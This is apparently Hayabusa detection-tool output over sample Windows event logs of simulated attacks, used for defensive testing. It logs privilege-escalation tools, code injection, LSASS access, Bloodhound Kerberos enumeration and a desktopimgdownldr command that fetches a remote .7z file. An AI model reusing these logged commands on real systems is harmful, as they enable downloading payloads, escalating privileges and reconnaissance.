c:\Windows\System32\cmd.exe : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: C:\Users\IEUser\AppData\Local\Temp\DNeruK\system32\Clipup.exe -o -previd pe386,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_uacme_58.evtx +2020-05-13 09:28:16.122 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\cmd.exe : Path: C:\Windows\System32\cmd.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k DcomLaunch -p -s PlugPlay,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/revshell_cmd_svchost_sysmon_1.evtx +2020-05-13 09:28:52.873 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/revshell_cmd_svchost_sysmon_1.evtx +2020-05-13 09:28:52.914 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k LocalService -p -s fdPHost : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\LOCAL SERVICE : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/revshell_cmd_svchost_sysmon_1.evtx +2020-05-13 09:28:52.950 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\System32\svchost.exe -k LocalServiceAndNoImpersonation -p -s wcncsvc : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\LOCAL SERVICE : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/revshell_cmd_svchost_sysmon_1.evtx +2020-05-24 10:13:47.756 
+09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: RogueWinRM.exe -p c:\Windows\System32\cmd.exe : Path: C:\Users\IEUser\Tools\PrivEsc\RogueWinRM.exe : User: NT AUTHORITY\LOCAL SERVICE : Parent Command: ""cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/RogueWinRM.evtx +2020-05-24 10:13:48.864 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/RogueWinRM.evtx +2020-05-24 10:13:50.327 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: c:\Windows\System32\cmd.exe : Path: C:\Windows\System32\cmd.exe : User: NT AUTHORITY\SYSTEM : Parent Command: RogueWinRM.exe -p c:\Windows\System32\cmd.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/RogueWinRM.evtx +2020-05-24 10:13:51.206 +09:00,MSEDGEWIN10,3,high,Remote PowerShell Session,,rules/sigma/network_connection/sysmon_remote_powershell_session_network.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/RogueWinRM.evtx +2020-05-24 10:13:51.206 +09:00,MSEDGEWIN10,3,high,Remote PowerShell Session,,rules/sigma/network_connection/sysmon_remote_powershell_session_network.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/RogueWinRM.evtx +2020-05-24 10:13:54.120 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: whoami : Path: C:\Windows\System32\whoami.exe : User: NT AUTHORITY\SYSTEM : Parent Command: c:\Windows\System32\cmd.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/RogueWinRM.evtx +2020-05-24 10:13:54.120 +09:00,MSEDGEWIN10,1,high,Run Whoami as 
SYSTEM,,rules/sigma/process_creation/win_whoami_as_system.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/RogueWinRM.evtx +2020-05-24 10:13:54.120 +09:00,MSEDGEWIN10,1,medium,Whoami Execution,,rules/sigma/process_creation/win_susp_whoami.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/RogueWinRM.evtx +2020-05-24 10:13:54.120 +09:00,MSEDGEWIN10,1,low,Local Accounts Discovery,,rules/sigma/process_creation/win_local_system_owner_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/RogueWinRM.evtx +2020-07-01 05:50:25.546 +09:00,MSEDGEWIN10,10,critical,Direct Syscall of NtOpenProcess,,rules/sigma/process_access/sysmon_direct_syscall_ntopenprocess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon_10_Evasion_Suspicious_NtOpenProcess_CallTrace.evtx +2020-07-01 05:50:25.546 +09:00,MSEDGEWIN10,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon_10_Evasion_Suspicious_NtOpenProcess_CallTrace.evtx +2020-07-03 02:51:37.819 +09:00,MSEDGEWIN10,1,high,Process Creation Sysmon Rule Alert,"Rule: suspicious execution path : Command: spooler.exe payload.bin : Path: C:\Users\Public\tools\cinj\spooler.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/evasion_codeinj_odzhan_spoolsv_sysmon_10_1.evtx +2020-07-03 02:51:37.819 +09:00,MSEDGEWIN10,1,high,Execution from Suspicious Folder,,rules/sigma/process_creation/win_susp_execution_path.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/evasion_codeinj_odzhan_spoolsv_sysmon_10_1.evtx +2020-07-03 02:51:37.872 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: notepad : Path: C:\Windows\System32\notepad.exe : User: NT AUTHORITY\SYSTEM : Parent 
Command: C:\Windows\System32\spoolsv.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/evasion_codeinj_odzhan_spoolsv_sysmon_10_1.evtx +2020-07-03 02:51:37.872 +09:00,MSEDGEWIN10,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/evasion_codeinj_odzhan_spoolsv_sysmon_10_1.evtx +2020-07-03 03:00:29.615 +09:00,LAPTOP-JU4M3I0E,1,high,Process Creation Sysmon Rule Alert,"Rule: suspicious execution path : Command: chost.exe payload.bin : Path: C:\Users\Public\tools\evasion\chost.exe : User: LAPTOP-JU4M3I0E\bouss : Parent Command: ""C:\windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/evasion_codeinj_odzhan_conhost_sysmon_10_1.evtx +2020-07-03 03:00:29.615 +09:00,LAPTOP-JU4M3I0E,1,high,Execution from Suspicious Folder,,rules/sigma/process_creation/win_susp_execution_path.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/evasion_codeinj_odzhan_conhost_sysmon_10_1.evtx +2020-07-03 03:00:29.650 +09:00,LAPTOP-JU4M3I0E,1,informational,Process Creation,Command: notepad : Path: C:\Windows\System32\notepad.exe : User: LAPTOP-JU4M3I0E\bouss : Parent Command: \??\C:\windows\system32\conhost.exe 0xffffffff -ForceV1,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/evasion_codeinj_odzhan_conhost_sysmon_10_1.evtx +2020-07-03 03:00:29.650 +09:00,LAPTOP-JU4M3I0E,1,medium,Conhost Parent Process Executions,,rules/sigma/process_creation/win_susp_conhost.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/evasion_codeinj_odzhan_conhost_sysmon_10_1.evtx +2020-07-03 03:00:29.650 +09:00,LAPTOP-JU4M3I0E,10,medium,Suspicious In-Memory Module 
Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/evasion_codeinj_odzhan_conhost_sysmon_10_1.evtx +2020-07-03 17:47:20.037 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: cmd /c desktopimgdownldr.exe /lockscreenurl:https://a.uguu.se/Hv0bgvgHGNeH_Bin.7z /eventName:desktopimgdownldr : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_11_1_lolbas_downldr_desktopimgdownldr.evtx +2020-07-03 17:47:20.037 +09:00,MSEDGEWIN10,1,high,Suspicious Desktopimgdownldr Command,,rules/sigma/process_creation/win_susp_desktopimgdownldr.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_11_1_lolbas_downldr_desktopimgdownldr.evtx +2020-07-03 17:47:20.073 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: desktopimgdownldr.exe /lockscreenurl:https://a.uguu.se/Hv0bgvgHGNeH_Bin.7z /eventName:desktopimgdownldr : Path: C:\Windows\System32\desktopimgdownldr.exe : User: MSEDGEWIN10\IEUser : Parent Command: cmd /c desktopimgdownldr.exe /lockscreenurl:https://a.uguu.se/Hv0bgvgHGNeH_Bin.7z /eventName:desktopimgdownldr ,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_11_1_lolbas_downldr_desktopimgdownldr.evtx +2020-07-03 17:47:20.073 +09:00,MSEDGEWIN10,1,high,Suspicious Desktopimgdownldr Command,,rules/sigma/process_creation/win_susp_desktopimgdownldr.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_11_1_lolbas_downldr_desktopimgdownldr.evtx +2020-07-03 17:47:21.491 +09:00,MSEDGEWIN10,11,high,Suspicious Desktopimgdownldr Target File,,rules/sigma/file_event/win_susp_desktopimgdownldr_file.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_11_1_lolbas_downldr_desktopimgdownldr.evtx +2020-07-03 17:55:49.123 
+09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Download LockScreen Image : URL: https://a.uguu.se/Hv0bgvgHGNeH_Bin.7z,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/windows_bits_4_59_60_lolbas desktopimgdownldr.evtx +2020-07-03 18:05:58.278 +09:00,win10.ecorp.com,1,informational,Process Creation,"Command: explorer.exe /root,""c:\windows\System32\calc.exe"" : Path: C:\Windows\explorer.exe : User: ECORP\Administrator : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/susp_explorer_exec_root_cmdline_@rimpq_@CyberRaiju.evtx +2020-07-03 18:05:58.278 +09:00,win10.ecorp.com,1,medium,Explorer Root Flag Process Tree Break,,rules/sigma/process_creation/win_susp_explorer_break_proctree.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/susp_explorer_exec_root_cmdline_@rimpq_@CyberRaiju.evtx +2020-07-03 18:05:58.278 +09:00,win10.ecorp.com,1,low,Proxy Execution Via Explorer.exe,,rules/sigma/process_creation/win_susp_explorer.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/susp_explorer_exec_root_cmdline_@rimpq_@CyberRaiju.evtx +2020-07-03 18:05:58.367 +09:00,win10.ecorp.com,1,informational,Process Creation,"Command: C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding : Path: C:\Windows\explorer.exe : User: ECORP\Administrator : Parent Command: C:\Windows\system32\svchost.exe -k DcomLaunch -p",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/susp_explorer_exec_root_cmdline_@rimpq_@CyberRaiju.evtx +2020-07-03 18:05:58.583 +09:00,win10.ecorp.com,1,informational,Process Creation,"Command: ""C:\Windows\System32\calc.exe"" : Path: C:\Windows\System32\calc.exe : User: ECORP\Administrator : Parent Command: C:\Windows\explorer.exe 
/factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/susp_explorer_exec_root_cmdline_@rimpq_@CyberRaiju.evtx +2020-07-03 18:05:58.739 +09:00,win10.ecorp.com,1,informational,Process Creation,"Command: ""C:\Windows\System32\win32calc.exe"" : Path: C:\Windows\System32\win32calc.exe : User: ECORP\Administrator : Parent Command: ""C:\Windows\System32\calc.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/susp_explorer_exec_root_cmdline_@rimpq_@CyberRaiju.evtx +2020-07-04 23:18:58.268 +09:00,MSEDGEWIN10,13,medium,Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/evasion_persis_hidden_run_keyvalue_sysmon_13.evtx +2020-07-04 23:18:58.268 +09:00,MSEDGEWIN10,13,medium,CurrentVersion Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/evasion_persis_hidden_run_keyvalue_sysmon_13.evtx +2020-07-08 06:51:39.204 +09:00,LAPTOP-JU4M3I0E,10,high,LSASS Access from Program in Suspicious Folder,,rules/sigma/process_access/win_susp_proc_access_lsass_susp_source.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_2x10_lsass_with_different_pid_RtlCreateProcessReflection.evtx +2020-07-08 06:51:39.256 +09:00,LAPTOP-JU4M3I0E,10,high,LSASS Access from Program in Suspicious Folder,,rules/sigma/process_access/win_susp_proc_access_lsass_susp_source.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_2x10_lsass_with_different_pid_RtlCreateProcessReflection.evtx +2020-07-08 06:51:39.262 +09:00,LAPTOP-JU4M3I0E,10,high,LSASS Access from Program in Suspicious 
Folder,,rules/sigma/process_access/win_susp_proc_access_lsass_susp_source.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_2x10_lsass_with_different_pid_RtlCreateProcessReflection.evtx +2020-07-09 06:41:52.449 +09:00,MSEDGEWIN10,12,medium,Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon_12_DE_AntiForensics_MRU_DeleteKey.evtx +2020-07-09 06:41:52.449 +09:00,MSEDGEWIN10,12,medium,CurrentVersion Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon_12_DE_AntiForensics_MRU_DeleteKey.evtx +2020-07-09 06:42:01.653 +09:00,MSEDGEWIN10,12,medium,Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon_12_DE_AntiForensics_MRU_DeleteKey.evtx +2020-07-09 06:42:01.653 +09:00,MSEDGEWIN10,12,medium,CurrentVersion Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon_12_DE_AntiForensics_MRU_DeleteKey.evtx +2020-07-09 06:43:13.791 +09:00,MSEDGEWIN10,12,medium,Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon_12_DE_AntiForensics_MRU_DeleteKey.evtx +2020-07-09 06:43:13.791 +09:00,MSEDGEWIN10,12,medium,CurrentVersion Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon_12_DE_AntiForensics_MRU_DeleteKey.evtx +2020-07-10 05:41:04.488 +09:00,rootdc1.offsec.lan,4769,informational,Kerberos Service Ticket Requested,User: admmig@OFFSEC.LAN : Service: ATACORE01$ : IP Address: ::ffff:10.23.23.9 : 
Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4769-Kerberos TGS host enumeration (Bloodhound).evtx +2020-07-10 05:41:04.490 +09:00,rootdc1.offsec.lan,4769,informational,Kerberos Service Ticket Requested,User: admmig@OFFSEC.LAN : Service: PKI01$ : IP Address: ::ffff:10.23.23.9 : Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4769-Kerberos TGS host enumeration (Bloodhound).evtx +2020-07-10 05:41:04.496 +09:00,rootdc1.offsec.lan,4769,informational,Kerberos Service Ticket Requested,User: admmig@OFFSEC.LAN : Service: EXCHANGE01$ : IP Address: ::ffff:10.23.23.9 : Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4769-Kerberos TGS host enumeration (Bloodhound).evtx +2020-07-10 05:41:04.497 +09:00,rootdc1.offsec.lan,4769,informational,Kerberos Service Ticket Requested,User: admmig@OFFSEC.LAN : Service: WEC01$ : IP Address: ::ffff:10.23.23.9 : Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4769-Kerberos TGS host enumeration (Bloodhound).evtx +2020-07-10 05:41:04.501 +09:00,rootdc1.offsec.lan,4769,informational,Kerberos Service Ticket Requested,User: admmig@OFFSEC.LAN : Service: FS02$ : IP Address: ::ffff:10.23.23.9 : Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4769-Kerberos TGS host enumeration (Bloodhound).evtx +2020-07-10 05:41:04.505 +09:00,rootdc1.offsec.lan,4769,informational,Kerberos Service 
Ticket Requested,User: admmig@OFFSEC.LAN : Service: WSUS01$ : IP Address: ::ffff:10.23.23.9 : Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4769-Kerberos TGS host enumeration (Bloodhound).evtx +2020-07-10 05:41:04.534 +09:00,rootdc1.offsec.lan,4769,informational,Kerberos Service Ticket Requested,User: admmig@OFFSEC.LAN : Service: DHCP01$ : IP Address: ::ffff:10.23.23.9 : Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4769-Kerberos TGS host enumeration (Bloodhound).evtx +2020-07-10 05:41:04.576 +09:00,rootdc1.offsec.lan,4769,informational,Kerberos Service Ticket Requested,User: admmig@OFFSEC.LAN : Service: ATANIDS01$ : IP Address: ::ffff:10.23.23.9 : Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4769-Kerberos TGS host enumeration (Bloodhound).evtx +2020-07-10 05:41:04.861 +09:00,rootdc1.offsec.lan,4769,informational,Kerberos Service Ticket Requested,User: admmig@OFFSEC.LAN : Service: PRTG-MON$ : IP Address: ::ffff:10.23.23.9 : Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4769-Kerberos TGS host enumeration (Bloodhound).evtx +2020-07-10 05:41:04.862 +09:00,rootdc1.offsec.lan,4769,informational,Kerberos Service Ticket Requested,User: admmig@OFFSEC.LAN : Service: MSSQL01$ : IP Address: ::ffff:10.23.23.9 : Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4769-Kerberos TGS host enumeration 
(Bloodhound).evtx +2020-07-10 05:41:04.863 +09:00,rootdc1.offsec.lan,4769,informational,Kerberos Service Ticket Requested,User: admmig@OFFSEC.LAN : Service: FS01$ : IP Address: ::ffff:10.23.23.9 : Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4769-Kerberos TGS host enumeration (Bloodhound).evtx +2020-07-10 05:41:04.864 +09:00,rootdc1.offsec.lan,4769,informational,Kerberos Service Ticket Requested,User: admmig@OFFSEC.LAN : Service: ADFS01$ : IP Address: ::ffff:10.23.23.9 : Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4769-Kerberos TGS host enumeration (Bloodhound).evtx +2020-07-10 05:41:04.865 +09:00,rootdc1.offsec.lan,4769,informational,Kerberos Service Ticket Requested,User: admmig@OFFSEC.LAN : Service: WEBIIS01$ : IP Address: ::ffff:10.23.23.9 : Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4769-Kerberos TGS host enumeration (Bloodhound).evtx +2020-07-10 05:41:04.885 +09:00,rootdc1.offsec.lan,4769,informational,Kerberos Service Ticket Requested,User: admmig@OFFSEC.LAN : Service: ROOTDC1$ : IP Address: ::ffff:10.23.23.9 : Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4769-Kerberos TGS host enumeration (Bloodhound).evtx +2020-07-10 05:41:04.887 +09:00,rootdc1.offsec.lan,4769,informational,Kerberos Service Ticket Requested,User: admmig@OFFSEC.LAN : Service: FS03VULN$ : IP Address: ::ffff:10.23.23.9 : Status: 
0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4769-Kerberos TGS host enumeration (Bloodhound).evtx +2020-07-10 05:41:04.887 +09:00,rootdc1.offsec.lan,4769,informational,Kerberos Service Ticket Requested,User: admmig@OFFSEC.LAN : Service: krbtgt : IP Address: ::ffff:10.23.23.9 : Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4769-Kerberos TGS host enumeration (Bloodhound).evtx +2020-07-10 05:41:04.912 +09:00,rootdc1.offsec.lan,4769,informational,Kerberos Service Ticket Requested,User: admmig@OFFSEC.LAN : Service: ROOTDC2$ : IP Address: ::ffff:10.23.23.9 : Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4769-Kerberos TGS host enumeration (Bloodhound).evtx +2020-07-10 05:41:04.939 +09:00,rootdc1.offsec.lan,4769,informational,Kerberos Service Ticket Requested,User: admmig@OFFSEC.LAN : Service: krbtgt : IP Address: ::ffff:10.23.23.9 : Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4769-Kerberos TGS host enumeration (Bloodhound).evtx +2020-07-10 05:41:04.949 +09:00,rootdc1.offsec.lan,4769,informational,Kerberos Service Ticket Requested,User: admmig@OFFSEC.LAN : Service: krbtgt : IP Address: ::ffff:10.23.23.9 : Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4769-Kerberos TGS host enumeration (Bloodhound).evtx +2020-07-10 05:41:04.950 +09:00,rootdc1.offsec.lan,4769,informational,Kerberos Service Ticket 
Requested,User: admmig@OFFSEC.LAN : Service: krbtgt : IP Address: ::ffff:10.23.23.9 : Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4769-Kerberos TGS host enumeration (Bloodhound).evtx +2020-07-10 05:41:04.951 +09:00,rootdc1.offsec.lan,4769,informational,Kerberos Service Ticket Requested,User: admmig@OFFSEC.LAN : Service: krbtgt : IP Address: ::ffff:10.23.23.9 : Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4769-Kerberos TGS host enumeration (Bloodhound).evtx +2020-07-10 05:41:05.016 +09:00,rootdc1.offsec.lan,4769,informational,Kerberos Service Ticket Requested,User: admmig@OFFSEC.LAN : Service: ROOTDC2$ : IP Address: ::ffff:10.23.23.9 : Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4769-Kerberos TGS host enumeration (Bloodhound).evtx +2020-07-10 05:41:58.983 +09:00,rootdc1.offsec.lan,4769,informational,Kerberos Service Ticket Requested,User: admmig@OFFSEC.LAN : Service: ROOTDC1$ : IP Address: ::ffff:10.23.23.9 : Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4769-Kerberos TGS host enumeration (Bloodhound).evtx +2020-07-10 05:41:59.810 +09:00,rootdc1.offsec.lan,4769,informational,Kerberos Service Ticket Requested,User: admmig@OFFSEC.LAN : Service: ROOTDC1$ : IP Address: ::ffff:10.23.23.9 : Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4769-Kerberos TGS host enumeration (Bloodhound).evtx 
